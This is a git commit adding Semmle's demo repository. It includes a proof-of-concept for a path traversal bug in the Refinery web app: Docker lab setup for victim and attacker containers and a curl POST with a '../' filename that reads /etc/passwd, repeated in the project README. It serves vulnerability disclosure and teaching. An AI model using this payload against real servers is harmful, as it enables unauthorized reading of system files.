Move Semmle demos to github.com

Author: kevinbackhouse

.gitignore

@@ -0,0 +1,2 @@
+# emacs backups
+*~

LICENSE.md

@@ -0,0 +1,13 @@
+Copyright 2019 Semmle Ltd.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.

NOTICE.md

@@ -0,0 +1,2 @@
+## Semmle Demos
+Copyright 2019 Semmle Ltd.

README.md

@@ -0,0 +1,11 @@
+# Semmle Demos
+
+This open source repository contains demos of Semmle's products: QL and LGTM. Many of the demos are examples of security vulnerabilities that were found by a QL query. These demos contain step-by-step instructions on how to build a QL query that finds the vulnerability.
+
+## How do I run the demos?
+
+You can use the [interactive query console](https://lgtm.com/help/lgtm/using-query-console) or the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin.
+
+## License
+
+The demos are licensed under [Apache License 2.0](LICENSE) by [Semmle](https://semmle.com).

lgtm_demos/javascript/amphtml_PR_integration/README.md

@@ -0,0 +1,3 @@
+# AMP HTML pull-request integration
+
+[Pull Request #13060](https://github.com/ampproject/amphtml/pull/13060) is a great example of LGTM's pull-request integration feature. In this pull request, [@lannka](https://github.com/lannka) wants to revert a change made by [@rsimha](https://github.com/rsimha) because it "breaks the regex". Within 15 minutes, LGTM posted a [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360860032) on the pull request, saying that it introduces a new alert for "Regular expression injection". As [@rsimha](https://github.com/rsimha) explains in the next [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360865628), he changed the regular expression to fix a security vulnerability. This pull request was going to reintroduce the vulnerability! Luckily, LGTM caught the problem quickly and the pull request was fixed before it got merged.

lgtm_demos/python/Refinery/ExploitPoC/README.md

@@ -0,0 +1,69 @@
+# Path injection in Refinery
+
+This directory contains a proof-of-concept exploit for a path injection vulnerability in [Refinery](https://github.com/daeilkim/refinery).
+
+To demonstrate the PoC in a safe environment, we will use two docker containers connected by a docker network bridge to simulate two separate computers: the first is the Refinery server and the second is the attacker's computer.
+
+We have tried to make the `Dockerfile`'s for the server and attacker as simple as possible, to make it clear that we have used vanilla [Ubuntu 18.04](http://releases.ubuntu.com/18.04/) with no unusual packages installed.
+
+## Network setup
+
+Create a docker network bridge, to simulate a network with two separate computers.
+
+```bash
+docker network create -d bridge --subnet 172.18.0.0/16 refinery-demo-network
+```
+
+## Refinery server setup
+
+Build the docker image:
+
+```bash
+cd refinery-server
+docker build . -t refinery-server --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```bash
+docker run --rm --network refinery-demo-network --ip=172.18.0.10 -h refinery-server --publish 8080:8080 -i -t refinery-server
+```
+
+Inside the container, start postgresql and Refinery.
+
+```bash
+sudo service postgresql start  # sudo password is "x"
+sudo -u postgres createuser --superuser victim
+sudo -u postgres createdb refinery
+cd refinery/refinery
+./reset_db.py
+./start_refinery.sh
+```
+
+At this point, you can check that Refinery is running by visiting [http://127.0.0.1:8080](http://127.0.0.1:8080) in your browser. (We exposed port 8080 on the docker container.) You should see a login screen. These are the default credentials:
+
+```
+username: doc
+password: refinery
+```
+
+## Attacker setup
+
+Build the docker image:
+
+```bash
+cd refinery-attacker
+docker build . -t refinery-attacker
+```
+
+Start the container:
+
+```bash
+docker run --rm --network refinery-demo-network --ip=172.18.0.11 -h refinery-attacker -i -t refinery-attacker
+```
+
+Inside the container, use `curl` to read arbitrary files on the server:
+
+```bash
+curl -d "filename=../../../../../../../../../../../../../../etc/passwd" -X POST http://172.18.0.10:8080/doc/get_doc_text
+```

lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile

@@ -0,0 +1,11 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y curl
+
+# Create user account for the attacker.
+RUN adduser attacker --disabled-password
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker

lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile

@@ -0,0 +1,31 @@
+FROM ubuntu:bionic
+
+RUN echo "Etc/UTC" > /etc/timezone
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+    apt-get install -y git python-pip postgresql redis-server gunicorn sudo
+
+ARG UID=1000
+
+# Create a non-root user account to run Refinery.
+RUN adduser victim --disabled-password --uid $UID
+
+# Grant the 'victim' user sudo access, so that we can start postgresql.
+RUN adduser victim sudo
+RUN echo "victim:x" | chpasswd
+
+# Switch over to the 'victim' user, since root access is no longer required
+USER victim
+WORKDIR /home/victim
+
+# Some of the Python module names have changed since the Refinery code
+# was written, so we have to apply a simple patch.
+COPY diff.txt /home/victim/diff.txt
+
+# Get Refinery source code and check out the vulnerable version.
+RUN git clone https://github.com/daeilkim/refinery && cd refinery && \
+    git checkout 0d5de8fc3d680a2c79bd0e9384b506229787c74f && \
+    git apply /home/victim/diff.txt
+
+RUN pip install flask flask_login flask_sqlalchemy flask_wtf celery joblib psycopg2 redis scipy

lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt

@@ -0,0 +1,38 @@
+diff --git a/refinery/refinery/__init__.py b/refinery/refinery/__init__.py
+index 3bd6a8b..4ad1311 100644
+--- a/refinery/refinery/__init__.py
++++ b/refinery/refinery/__init__.py
+@@ -1,6 +1,6 @@
+ from flask import Flask
+-from flask.ext.sqlalchemy import SQLAlchemy
+-from flask.ext.login import LoginManager
++from flask_sqlalchemy import SQLAlchemy
++from flask_login import LoginManager
+ from celery import Celery
+ 
+ print "Opening a Refinery"
+diff --git a/refinery/refinery/webapp/admin.py b/refinery/refinery/webapp/admin.py
+index e6d26d4..23af1dd 100644
+--- a/refinery/refinery/webapp/admin.py
++++ b/refinery/refinery/webapp/admin.py
+@@ -1,6 +1,6 @@
+ from flask import g, redirect, render_template, session, url_for, flash #url_for, abort, render_template, flash, send_from_directory, jsonify, Response, json
+ from refinery import app, lm
+-from flask.ext.login import login_user, logout_user, login_required
++from flask_login import login_user, logout_user, login_required
+ from refinery.data.models import User
+ from flask_wtf import Form
+ from wtforms import TextField, PasswordField, BooleanField
+diff --git a/refinery/refinery/webapp/main_menu.py b/refinery/refinery/webapp/main_menu.py
+index 670c62e..6e5ca7f 100644
+--- a/refinery/refinery/webapp/main_menu.py
++++ b/refinery/refinery/webapp/main_menu.py
+@@ -14,7 +14,7 @@ Or else what?  Exactly.
+ """
+ 
+ from flask import request, g, render_template, jsonify, Response, json
+-from flask.ext.login import current_user,login_required
++from flask_login import current_user,login_required
+ 
+ import celery
+ 

lgtm_demos/python/Refinery/README.md

@@ -0,0 +1,11 @@
+# Path injection in Refinery
+
+One of LGTM's default queries found a path injection vulnerability in the open source [Refinery](https://github.com/daeilkim/refinery) project:
+
+https://lgtm.com/projects/g/daeilkim/refinery/snapshot/5eb10ae26cc67ac3d39d37e932274798631e15b2/files/refinery/refinery/webapp/topicmodel.py#xaea6e729c50ca7a5:1
+
+This bug is trivial to exploit. If Refinery is running on the website example.com, then an attacker can read arbitrary files on the server like this:
+
+curl -d "filename=../../../../../../../../../../../../etc/passwd" -X POST http://example.com/doc/get_doc_text
+
+Semmle reported this vulnerability to the maintainers of Refinery on 2018-12-16 (using the email addresses listed [here](https://github.com/daeilkim/refinery/blob/0d5de8fc3d680a2c79bd0e9384b506229787c74f/README.md)), but they did not respond. Kevin Backhouse also attempted to contact Daeil Kim using [LinkedIn](https://www.linkedin.com/in/daeil/), but did not receive a response.